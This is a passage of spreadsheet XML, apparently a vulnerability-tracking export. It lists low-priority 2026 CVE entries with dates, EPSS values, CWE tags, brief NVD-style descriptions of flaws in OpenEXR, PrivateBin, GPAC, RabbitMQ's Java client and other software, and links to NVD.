        </is>
      </c>
    </row>
    <row r="6058">
      <c r="A6058" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6058" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52307</t>
        </is>
      </c>
      <c r="C6058" s="5" t="inlineStr"/>
      <c r="D6058" s="5" t="inlineStr"/>
      <c r="E6058" s="5" t="inlineStr"/>
      <c r="F6058" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G6058" s="5" t="inlineStr"/>
      <c r="H6058" s="5" t="inlineStr"/>
      <c r="I6058" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J6058" s="5" t="inlineStr"/>
      <c r="K6058" s="5" t="inlineStr"/>
      <c r="L6058" s="5" t="inlineStr">
        <is>
          <t>An authenticated stored cross-site scripting (XSS) vulnerability in the Column Management component of ClassCMS 1CMS v5.6 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the title field.</t>
        </is>
      </c>
      <c r="M6058" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52307</t>
        </is>
      </c>
    </row>
    <row r="6059">
      <c r="A6059" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6059" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52482</t>
        </is>
      </c>
      <c r="C6059" s="5" t="inlineStr"/>
      <c r="D6059" s="5" t="inlineStr"/>
      <c r="E6059" s="5" t="inlineStr"/>
      <c r="F6059" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6059" s="5" t="inlineStr"/>
      <c r="H6059" s="5" t="inlineStr"/>
      <c r="I6059" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6059" s="5" t="inlineStr"/>
      <c r="K6059" s="5" t="inlineStr"/>
      <c r="L6059" s="5" t="inlineStr">
        <is>
          <t>An issue in SJRC F11 SJ-GPS-PRO firmware build 2019-09-17 allows a remote attacker to obtain sensitive information via the inetd service spawns /app/sh_for_telnet</t>
        </is>
      </c>
      <c r="M6059" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52482</t>
        </is>
      </c>
    </row>
    <row r="6060">
      <c r="A6060" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6060" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54920</t>
        </is>
      </c>
      <c r="C6060" s="5" t="n">
        <v>0</v>
      </c>
      <c r="D6060" s="5" t="inlineStr">
        <is>
          <t>NONE</t>
        </is>
      </c>
      <c r="E6060" s="5" t="inlineStr"/>
      <c r="F6060" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6060" s="5" t="inlineStr"/>
      <c r="H6060" s="5" t="inlineStr"/>
      <c r="I6060" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J6060" s="5" t="inlineStr"/>
      <c r="K6060" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-824</t>
        </is>
      </c>
      <c r="L6060" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. In versions 3.4.0 through 3.4.12, a reachable assertion failure in the HTJ2K decode path allows a crafted HTJ2K-compressed EXR file to cause an unconditional process abort in any application that calls exr_start_read() on untrusted input, resulting in denial of service. The crash is triggered by a QCD marker whose lower five bits are zero, which OpenEXR passes into the vendored OpenJPH library while constructing the codestream and evaluating its quantization delta parameters. OpenJPH uses an assertion rather than a recoverable error to validate those bits, so any invalid value calls abort() directly and cannot be intercepted by surrounding error handling, a problem compounded by OpenEXR wrapping only its internal HT header parser in error handling while leaving the later codestream read and construction calls unprotected. This issue has been resolved in version 3.4.13.</t>
        </is>
      </c>
      <c r="M6060" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54920</t>
        </is>
      </c>
    </row>
    <row r="6061">
      <c r="A6061" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6061" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55891</t>
        </is>
      </c>
      <c r="C6061" s="5" t="n">
        <v>0</v>
      </c>
      <c r="D6061" s="5" t="inlineStr">
        <is>
          <t>NONE</t>
        </is>
      </c>
      <c r="E6061" s="5" t="inlineStr"/>
      <c r="F6061" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G6061" s="5" t="inlineStr"/>
      <c r="H6061" s="5" t="inlineStr"/>
      <c r="I6061" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J6061" s="5" t="inlineStr"/>
      <c r="K6061" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="L6061" s="5" t="inlineStr">
        <is>
          <t>PrivateBin is an online pastebin where the server has zero knowledge of pasted data. Prior to 2.0.5, Request::getRequestUri() in lib/Request.php passes $_SERVER['REQUEST_URI'] through FILTER_SANITIZE_URL, which does not remove quotation marks, angle brackets, or apostrophes, and Controller::_init() stores the attacker-controlled value in Controller::$_urlBase. Controller::_jsonld() in lib/Controller.php then uses str_replace() to insert that value without JSON escaping into js/types.jsonld, js/paste.jsonld, and the other JSON-LD templates used by /?jsonld= and /?pasteid. A raw quotation mark delivered by an HTTP client, proxy, or structured-data crawler that does not normalize the request target can break out of the JSON string and inject arbitrary key-value data into a CORS-open application/ld+json response. The jsonld branch in Controller::__construct() returns before _setCacheHeaders(), so the response also lacks X-Content-Type-Options: nosniff, Content Security Policy, X-Frame-Options, and Referrer-Policy. Direct script execution was not demonstrated, but manipulated responses can affect structured-data consumers or combine with less strict clients. This issue is fixed in version 2.0.5.</t>
        </is>
      </c>
      <c r="M6061" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55891</t>
        </is>
      </c>
    </row>
    <row r="6062">
      <c r="A6062" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6062" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56125</t>
        </is>
      </c>
      <c r="C6062" s="5" t="inlineStr"/>
      <c r="D6062" s="5" t="inlineStr"/>
      <c r="E6062" s="5" t="inlineStr"/>
      <c r="F6062" s="5" t="inlineStr"/>
      <c r="G6062" s="5" t="inlineStr"/>
      <c r="H6062" s="5" t="inlineStr"/>
      <c r="I6062" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6062" s="5" t="inlineStr"/>
      <c r="K6062" s="5" t="inlineStr"/>
      <c r="L6062" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="M6062" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56125</t>
        </is>
      </c>
    </row>
    <row r="6063">
      <c r="A6063" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6063" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57844</t>
        </is>
      </c>
      <c r="C6063" s="5" t="inlineStr"/>
      <c r="D6063" s="5" t="inlineStr"/>
      <c r="E6063" s="5" t="inlineStr"/>
      <c r="F6063" s="5" t="inlineStr"/>
      <c r="G6063" s="5" t="inlineStr"/>
      <c r="H6063" s="5" t="inlineStr"/>
      <c r="I6063" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J6063" s="5" t="inlineStr"/>
      <c r="K6063" s="5" t="inlineStr"/>
      <c r="L6063" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="M6063" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57844</t>
        </is>
      </c>
    </row>
    <row r="6064">
      <c r="A6064" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6064" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61634</t>
        </is>
      </c>
      <c r="C6064" s="5" t="n">
        <v>0</v>
      </c>
      <c r="D6064" s="5" t="inlineStr">
        <is>
          <t>NONE</t>
        </is>
      </c>
      <c r="E6064" s="5" t="inlineStr"/>
      <c r="F6064" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G6064" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H6064" s="5" t="inlineStr"/>
      <c r="I6064" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J6064" s="5" t="inlineStr"/>
      <c r="K6064" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L6064" s="5" t="inlineStr">
        <is>
          <t>The RabbitMQ Java client library allows Java and JVM-based applications to connect to and interact with RabbitMQ nodes. Prior to 5.33.0, the AMQP connection tuning path records the negotiated AMQP frame_max value, but src/main/java/com/rabbitmq/client/impl/SocketFrameHandler.java and NettyFrameHandlerFactory continue to validate broker-controlled frame payload lengths against maxInboundMessageBodySize because the negotiated limit is not applied consistently through setMaxInboundFramePayloadSize. A malicious or compromised broker can send a method frame larger than the negotiated frame_max during or after connection establishment, causing the client to allocate and decode a protocol-invalid frame instead of rejecting it with MalformedFrameException. The protocol violation can disrupt the affected connection and cause client-side denial of service. This issue is fixed in version 5.33.0.</t>
        </is>
      </c>
      <c r="M6064" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61634</t>
        </is>
      </c>
    </row>
    <row r="6065">
      <c r="A6065" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6065" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68006</t>
        </is>
      </c>
      <c r="C6065" s="5" t="inlineStr"/>
      <c r="D6065" s="5" t="inlineStr"/>
      <c r="E6065" s="5" t="inlineStr"/>
      <c r="F6065" s="5" t="inlineStr"/>
      <c r="G6065" s="5" t="inlineStr"/>
      <c r="H6065" s="5" t="inlineStr"/>
      <c r="I6065" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J6065" s="5" t="inlineStr"/>
      <c r="K6065" s="5" t="inlineStr"/>
      <c r="L6065" s="5" t="inlineStr">
        <is>
          <t>An issue in Puma v.5.0.0 and before v.8.0.3 allows an attacker to execute arbitrary code via the ext/puma_http11/http11_parser.rl file</t>
        </is>
      </c>
      <c r="M6065" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68006</t>
        </is>
      </c>
    </row>
    <row r="6066">
      <c r="A6066" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6066" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70613</t>
        </is>
      </c>
      <c r="C6066" s="5" t="inlineStr"/>
      <c r="D6066" s="5" t="inlineStr"/>
      <c r="E6066" s="5" t="inlineStr"/>
      <c r="F6066" s="5" t="inlineStr"/>
      <c r="G6066" s="5" t="inlineStr"/>
      <c r="H6066" s="5" t="inlineStr"/>
      <c r="I6066" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J6066" s="5" t="inlineStr"/>
      <c r="K6066" s="5" t="inlineStr"/>
      <c r="L6066" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="M6066" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70613</t>
        </is>
      </c>
    </row>
    <row r="6067">
      <c r="A6067" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6067" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70614</t>
        </is>
      </c>
      <c r="C6067" s="5" t="inlineStr"/>
      <c r="D6067" s="5" t="inlineStr"/>
      <c r="E6067" s="5" t="inlineStr"/>
      <c r="F6067" s="5" t="inlineStr"/>
      <c r="G6067" s="5" t="inlineStr"/>
      <c r="H6067" s="5" t="inlineStr"/>
      <c r="I6067" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J6067" s="5" t="inlineStr"/>
      <c r="K6067" s="5" t="inlineStr"/>
      <c r="L6067" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="M6067" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70614</t>
        </is>
      </c>
    </row>
    <row r="6068">
      <c r="A6068" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6068" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71612</t>
        </is>
      </c>
      <c r="C6068" s="5" t="inlineStr"/>
      <c r="D6068" s="5" t="inlineStr"/>
      <c r="E6068" s="5" t="inlineStr"/>
      <c r="F6068" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6068" s="5" t="inlineStr"/>
      <c r="H6068" s="5" t="inlineStr"/>
      <c r="I6068" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6068" s="5" t="inlineStr"/>
      <c r="K6068" s="5" t="inlineStr"/>
      <c r="L6068" s="5" t="inlineStr">
        <is>
          <t>Buffer Overflow vulnerability in GPAC c2dee3aff638cd96f9617ac5b17dc2868cd90ef3 allows an attacker to execute arbitrary code via the nhntdmx_process() function. Fixed in fac50e6a12ac27ffabdd5d3080b51afcc44ad8d6.</t>
        </is>
      </c>
      <c r="M6068" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71612</t>
        </is>
      </c>
    </row>
    <row r="6069">
      <c r="A6069" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6069" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71614</t>
        </is>
      </c>
      <c r="C6069" s="5" t="inlineStr"/>
      <c r="D6069" s="5" t="inlineStr"/>
      <c r="E6069" s="5" t="inlineStr"/>
      <c r="F6069" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6069" s="5" t="inlineStr"/>
      <c r="H6069" s="5" t="inlineStr"/>
      <c r="I6069" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6069" s="5" t="inlineStr"/>
      <c r="K6069" s="5" t="inlineStr"/>
      <c r="L6069" s="5" t="inlineStr">
        <is>
          <t>An issue in GPAC c2dee3aff638cd96f9617ac5b17dc2868cd90ef3 allows an attacker to execute arbitrary code via the src/media_tools/dvb_mpe.c, descriptorTime_slice_fec_identifier() and gf_m2ts_ipdatagram_reader() components. Fixed in 0e4093392e1f847c90d20e031e893cd942fef938.</t>
        </is>
      </c>
      <c r="M6069" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71614</t>
        </is>
      </c>
    </row>
    <row r="6070">
      <c r="A6070" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6070" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71616</t>
        </is>
      </c>
      <c r="C6070" s="5" t="inlineStr"/>
      <c r="D6070" s="5" t="inlineStr"/>
      <c r="E6070" s="5" t="inlineStr"/>
      <c r="F6070" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G6070" s="5" t="inlineStr"/>
      <c r="H6070" s="5" t="inlineStr"/>
      <c r="I6070" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6070" s="5" t="inlineStr"/>
      <c r="K6070" s="5" t="inlineStr"/>
      <c r="L6070" s="5" t="inlineStr">
        <is>
          <t>An issue in GPAC c2dee3aff638cd96f9617ac5b17dc2868cd90ef3 allows an attacker to cause a denial of service via the function gf_route_media_complete_object(). Fixed in 3c4e6c5b3e0c6fa9b16d55599701a08354538fab.</t>
        </is>
      </c>
      <c r="M6070" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71616</t>
        </is>
      </c>
    </row>
    <row r="6071">
      <c r="A6071" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6071" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71620</t>
        </is>
      </c>
      <c r="C6071" s="5" t="inlineStr"/>
      <c r="D6071" s="5" t="inlineStr"/>
      <c r="E6071" s="5" t="inlineStr"/>
      <c r="F6071" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6071" s="5" t="inlineStr"/>
      <c r="H6071" s="5" t="inlineStr"/>
      <c r="I6071" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J6071" s="5" t="inlineStr"/>
      <c r="K6071" s="5" t="inlineStr"/>
      <c r="L6071" s="5" t="inlineStr">
        <is>
          <t>File Upload vulnerability in Zhao-github ApiAdmin v.5.0.1 allows a remote attacker to execute arbitrary code via a crafted .php file</t>
        </is>
      </c>
      <c r="M6071" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71620</t>
        </is>
      </c>
    </row>
    <row r="6072">
      <c r="A6072" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6072" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71640</t>
        </is>
      </c>
      <c r="C6072" s="5" t="inlineStr"/>
      <c r="D6072" s="5" t="inlineStr"/>
      <c r="E6072" s="5" t="inlineStr"/>
      <c r="F6072" s="5" t="inlineStr"/>
      <c r="G6072" s="5" t="inlineStr"/>
      <c r="H6072" s="5" t="inlineStr"/>
      <c r="I6072" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J6072" s="5" t="inlineStr"/>
      <c r="K6072" s="5" t="inlineStr"/>
      <c r="L6072" s="5" t="inlineStr">
        <is>
          <t>An issue in ZJU-FAST-Lab EGO-Planner-v2 All versions up to commit 5c99a95880401e2599638d567abc0e240396cb42 allows unsafe vehicle motion via improper handling of expired trajectory data in the replanning pipeline</t>
        </is>
      </c>
      <c r="M6072" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71640</t>
        </is>
      </c>
    </row>
    <row r="6073">
      <c r="A6073" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6073" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71642</t>
        </is>
      </c>
      <c r="C6073" s="5" t="inlineStr"/>
      <c r="D6073" s="5" t="inlineStr"/>
      <c r="E6073" s="5" t="inlineStr"/>
      <c r="F6073" s="5" t="inlineStr"/>
      <c r="G6073" s="5" t="inlineStr"/>
      <c r="H6073" s="5" t="inlineStr"/>
      <c r="I6073" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J6073" s="5" t="inlineStr"/>
      <c r="K6073" s="5" t="inlineStr"/>
      <c r="L6073" s="5" t="inlineStr">
        <is>
          <t>An issue in ZJU-FAST-Lab EGO-Planner-v2 All versions up to commit 5c99a95880401e2599638d567abc0e240396cb42 allows an attacker to cause a denial of service via the EGOReplanFSM::checkCollisionCallback()</t>
        </is>
      </c>
      <c r="M6073" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71642</t>
        </is>
      </c>
    </row>
    <row r="6074">
      <c r="A6074" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6074" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71643</t>
        </is>
      </c>
      <c r="C6074" s="5" t="inlineStr"/>
      <c r="D6074" s="5" t="inlineStr"/>
      <c r="E6074" s="5" t="inlineStr"/>
      <c r="F6074" s="5" t="inlineStr"/>
      <c r="G6074" s="5" t="inlineStr"/>
      <c r="H6074" s="5" t="inlineStr"/>
      <c r="I6074" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J6074" s="5" t="inlineStr"/>
      <c r="K6074" s="5" t="inlineStr"/>
      <c r="L6074" s="5" t="inlineStr">
        <is>
          <t>An issue in ZJU-FAST-Lab EGO-Planner-v2 All versions up to commit 5c99a95880401e2599638d567abc0e240396cb42 allows an attacker to cause a denial of service via the EGOReplanFSM component</t>
        </is>
      </c>
      <c r="M6074" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71643</t>
        </is>
      </c>
    </row>
    <row r="6075">
      <c r="A6075" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6075" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71645</t>
        </is>
      </c>
      <c r="C6075" s="5" t="inlineStr"/>
      <c r="D6075" s="5" t="inlineStr"/>
      <c r="E6075" s="5" t="inlineStr"/>
      <c r="F6075" s="5" t="inlineStr"/>
      <c r="G6075" s="5" t="inlineStr"/>
      <c r="H6075" s="5" t="inlineStr"/>
      <c r="I6075" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J6075" s="5" t="inlineStr"/>
      <c r="K6075" s="5" t="inlineStr"/>
      <c r="L6075" s="5" t="inlineStr">
        <is>
          <t>An issue in Robotics-STAR-Lab (SYSU STAR Group) RACER Tested affected version: commit abcdef1234567890 allows an attacker to cause a denial of service via the exploration state machine</t>
        </is>
      </c>
      <c r="M6075" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71645</t>
        </is>
      </c>
    </row>
    <row r="6076">
      <c r="A6076" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6076" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71647</t>
        </is>
      </c>
      <c r="C6076" s="5" t="inlineStr"/>
      <c r="D6076" s="5" t="inlineStr"/>
      <c r="E6076" s="5" t="inlineStr"/>
      <c r="F6076" s="5" t="inlineStr"/>
      <c r="G6076" s="5" t="inlineStr"/>
      <c r="H6076" s="5" t="inlineStr"/>
      <c r="I6076" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J6076" s="5" t="inlineStr"/>
      <c r="K6076" s="5" t="inlineStr"/>
      <c r="L6076" s="5" t="inlineStr">
        <is>
          <t>An issue in EGO-Planner-v2 All versions up to commit 5c99a95880401e2599638d567abc0e240396cb42 allows an attacker to cause a denial of service via the checkCollisionCallback, execFSMCallback, planFromGlobalTraj in ego_replan_fsm.cpp</t>
        </is>
      </c>
      <c r="M6076" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71647</t>
        </is>
      </c>
    </row>
    <row r="6077">
      <c r="A6077" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6077" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71801</t>
        </is>
      </c>
      <c r="C6077" s="5" t="inlineStr"/>
      <c r="D6077" s="5" t="inlineStr"/>
      <c r="E6077" s="5" t="inlineStr"/>
      <c r="F6077" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6077" s="5" t="inlineStr"/>
      <c r="H6077" s="5" t="inlineStr"/>
      <c r="I6077" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6077" s="5" t="inlineStr"/>
      <c r="K6077" s="5" t="inlineStr"/>
      <c r="L6077" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in s-pms SPMS-Server through v1.0. The application contains a hardcoded default access token secret within its core configuration file, which is not overridden or removed in the production environment profile. A remote, unauthenticated attacker can locally forge valid administrative session tokens to completely bypass the authentication mechanism gaining full unauthorized access to protected backend APIs.</t>
        </is>
      </c>
      <c r="M6077" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71801</t>
        </is>
      </c>
    </row>
    <row r="6078">
      <c r="A6078" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6078" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71802</t>
        </is>
      </c>
      <c r="C6078" s="5" t="inlineStr"/>
      <c r="D6078" s="5" t="inlineStr"/>
      <c r="E6078" s="5" t="inlineStr"/>
      <c r="F6078" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G6078" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H6078" s="5" t="inlineStr"/>
      <c r="I6078" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6078" s="5" t="inlineStr"/>
      <c r="K6078" s="5" t="inlineStr"/>
      <c r="L6078" s="5" t="inlineStr">
        <is>
          <t>A stored Cross-Site Scripting (XSS) vulnerability exists in the announcement preview component of REBUILD 4.4.3. Although the announcement content undergoes HTML escaping on the server side, the client-side preview code reverses the escaped entities using jQuery's `html().text()` method and subsequently injects the result into the DOM. An administrator or attacker capable of controlling the announcement content can exploit this vulnerability to execute arbitrary JavaScript code in the browsers of users viewing the affected pages "which may include the dashboard, activity feed, or login page, depending on the announcement's visibility settings.</t>
        </is>
      </c>
      <c r="M6078" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71802</t>
        </is>
      </c>
    </row>
    <row r="6079">
      <c r="A6079" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6079" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71807</t>
        </is>
      </c>
      <c r="C6079" s="5" t="inlineStr"/>
      <c r="D6079" s="5" t="inlineStr"/>
      <c r="E6079" s="5" t="inlineStr"/>
      <c r="F6079" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6079" s="5" t="inlineStr"/>
      <c r="H6079" s="5" t="inlineStr"/>
      <c r="I6079" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6079" s="5" t="inlineStr"/>
      <c r="K6079" s="5" t="inlineStr"/>
      <c r="L6079" s="5" t="inlineStr">
        <is>
          <t>In RuoYi-Cloud-Plus &lt;= 2.6.2 in the ruoyi-workflow module, multiple core task APIs in FlwTaskController lack permission annotations, and the Service layer does not verify whether the current user is the task handler/related user. Authenticated low-privileged remote attackers can read sensitive workflow task details (/task/getTask/{taskId}) and trigger unauthorized workflow executions (/task/startWorkFlow).</t>
        </is>
      </c>
      <c r="M6079" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71807</t>
        </is>
      </c>
    </row>
    <row r="6080">
      <c r="A6080" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6080" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71809</t>
        </is>
      </c>
      <c r="C6080" s="5" t="inlineStr"/>
      <c r="D6080" s="5" t="inlineStr"/>
      <c r="E6080" s="5" t="inlineStr"/>
      <c r="F6080" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6080" s="5" t="inlineStr"/>
      <c r="H6080" s="5" t="inlineStr"/>
      <c r="I6080" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6080" s="5" t="inlineStr"/>
      <c r="K6080" s="5" t="inlineStr"/>
      <c r="L6080" s="5" t="inlineStr">
        <is>
          <t>Authentication Bypass via Hardcoded Master Verification Code vulnerability in Siam Ordering (siam-server) 1.0.0 allows remote unauthenticated attackers to log in as any user, merchant, or administrator.</t>
        </is>
      </c>
      <c r="M6080" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71809</t>
        </is>
      </c>
    </row>
    <row r="6081">
      <c r="A6081" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6081" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72885</t>
        </is>
      </c>
      <c r="C6081" s="5" t="n">
        <v>0</v>
      </c>
      <c r="D6081" s="5" t="inlineStr">
        <is>
          <t>NONE</t>
        </is>
      </c>
      <c r="E6081" s="5" t="inlineStr"/>
      <c r="F6081" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G6081" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H6081" s="5" t="inlineStr"/>
      <c r="I6081" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J6081" s="5" t="inlineStr"/>
      <c r="K6081" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L6081" s="5" t="inlineStr">
        <is>
